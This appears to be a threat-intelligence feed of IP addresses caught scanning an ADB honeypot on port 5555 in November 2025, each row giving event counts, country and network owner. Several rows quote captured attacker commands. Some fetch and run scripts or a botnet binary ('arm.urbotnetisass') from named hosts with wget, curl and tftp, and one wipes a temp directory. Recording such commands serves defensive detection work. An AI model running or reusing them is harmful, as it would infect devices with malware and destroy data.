IPv445.156.128.158Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0scanning_host2025-11-09
IPv445.156.129.161Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0scanning_host2025-11-09
IPv445.33.68.33Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv445.33.84.124Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv445.55.130.199Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv445.56.66.119Attacker IP • ADB / seen in ADBHoney; events=301; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv445.95.147.229Attacker IP • ADB / seen in ADBHoney; events=612; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv446.27.101.170Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=ES; asn=12430; asn_org=Vodafone Spain; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv451.161.172.223Attacker IP • ADB / seen in ADBHoney; events=29; ports=5555; cc=AU; asn=16276; asn_org=OVH SAS; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv454.215.46.194Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=16509; asn_org=AMAZON-02; adb_cmd_hits=0scanning_host2025-11-09
IPv458.227.216.183Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=KR; asn=17574; asn_org=Seoul Metropolitan Government Computer Center; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity"scanning_host2025-11-09
IPv459.27.225.24Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0scanning_host2025-11-09
IPv461.10.160.142Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=HK; asn=9908; asn_org=HK Cable TV Ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv461.3.102.238Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=IN; asn=9829; asn_org=National Internet Backbone; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0malware_hosting2025-11-09
IPv464.227.146.243Attacker IP • ADB / seen in ADBHoney; events=64; ports=5555; cc=IN; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.156.108Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.156.109Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.156.120Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.156.52Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.156.61Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.156.80Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.156.84Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.152Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.164Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.212Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.225Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.227Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.239Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.47Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode,Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.61Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.77Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv464.62.197.86Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.108Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.120Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.152Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.202Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.205Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.20.117Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.20.68Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.20.69Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.20.84Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.20.92Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv466.132.153.117Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv466.132.153.132Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv466.175.220.105Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv471.6.134.233Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=10439; asn_org=CARINET; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv471.6.233.155Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=10439; asn_org=CARINET; adb_cmd_hits=0scanning_host2025-11-09
IPv474.207.253.22Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv474.89.42.238Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=6128; asn_org=CABLE-NET-1; adb_cmd_hits=0scanning_host2025-11-09
IPv477.83.240.70Attacker IP • ADB / seen in ADBHoney; events=415; ports=5555; cc=US; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv477.90.39.123Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=DE; asn=209874; asn_org=Tech Tide Portugal Unipessoal LDA; adb_cmd_hits=0; cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://77.90.39.122/1.sh; curl -O http://77.90.39.122/1.sh; chmod 777 1.sh; sh 1.sh; tftp 77.90.39.1"scanning_host2025-11-09
IPv478.128.114.126Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0scanning_host2025-11-09
IPv478.128.114.130Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0scanning_host2025-11-09
IPv478.128.114.38Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0scanning_host2025-11-09
IPv478.42.82.0Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=DE; asn=3209; asn_org=Vodafone GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv479.124.49.90Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0scanning_host2025-11-09
IPv479.124.58.18Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0scanning_host2025-11-09
IPv479.240.226.74Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=DE; asn=3320; asn_org=Deutsche Telekom AG; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/log"scanning_host2025-11-09
IPv480.82.77.144Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=202425; asn_org=IP Volume inc; adb_cmd_hits=0scanning_host2025-11-09
IPv480.94.95.221Attacker IP • ADB / seen in ADBHoney; events=31; ports=5555; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv480.94.95.75Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv488.210.63.190Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0scanning_host2025-11-09
IPv489.106.69.44Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DE; asn=49581; asn_org=Tube-Hosting; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv489.248.163.48Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=202425; asn_org=IP Volume inc; adb_cmd_hits=0scanning_host2025-11-09
IPv491.202.233.67Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=TM; asn=200593; asn_org=Prospero Ooo; adb_cmd_hits=0scanning_host2025-11-09
IPv492.63.197.210Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0scanning_host2025-11-09
IPv493.123.109.121Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=BG; asn=48090; asn_org=Techoff Srv Limited; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv494.74.182.167Attacker IP • ADB / seen in ADBHoney; events=410; ports=5555; cc=IR; asn=214967; asn_org=Optibounce, LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.urbotnetisass; curl http://94.154.35.154/arm.urbotnetisass -O; chmod +x arm.urbotnetisass; ./ar"scanning_host2025-11-09
IPv494.74.182.75Attacker IP • ADB / seen in ADBHoney; events=170; ports=5555; cc=IR; asn=214967; asn_org=Optibounce, LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.urbotnetisass; curl http://94.154.35.154/arm.urbotnetisass -O; chmod +x arm.urbotnetisass; ./ar"scanning_host2025-11-09
IPv494.74.191.7Attacker IP • ADB / seen in ADBHoney; events=186; ports=5555; cc=IR; asn=214967; asn_org=Optibounce, LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.urbotnetisass; curl http://94.154.35.154/arm.urbotnetisass -O; chmod +x arm.urbotnetisass; ./ar"scanning_host2025-11-09
IPv4204.76.203.230Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.212Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.217Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv488.247.182.131Attacker IP • ADB / seen in ADBHoney; events=46; ports=5555; cc=TR; asn=47331; asn_org=Turk Telekom; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*"scanning_host2025-11-09
IPv4104.237.156.209Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv485.11.183.5Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=GB; asn=212027; asn_org=PebbleHost Ltd; adb_cmd_hits=0scanning_host2025-11-09
IPv4159.196.168.164Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=AU; asn=4764; asn_org=Aussie Broadband; adb_cmd_hits=0scanning_host2025-11-10
IPv4103.125.189.66Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0scanning_host2025-11-10
IPv4216.218.206.66Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-10
IPv4216.218.206.74Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-10
IPv4211.184.55.136Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0scanning_host2025-11-10
IPv4198.235.24.207Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-10
IPv4162.142.125.196Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-10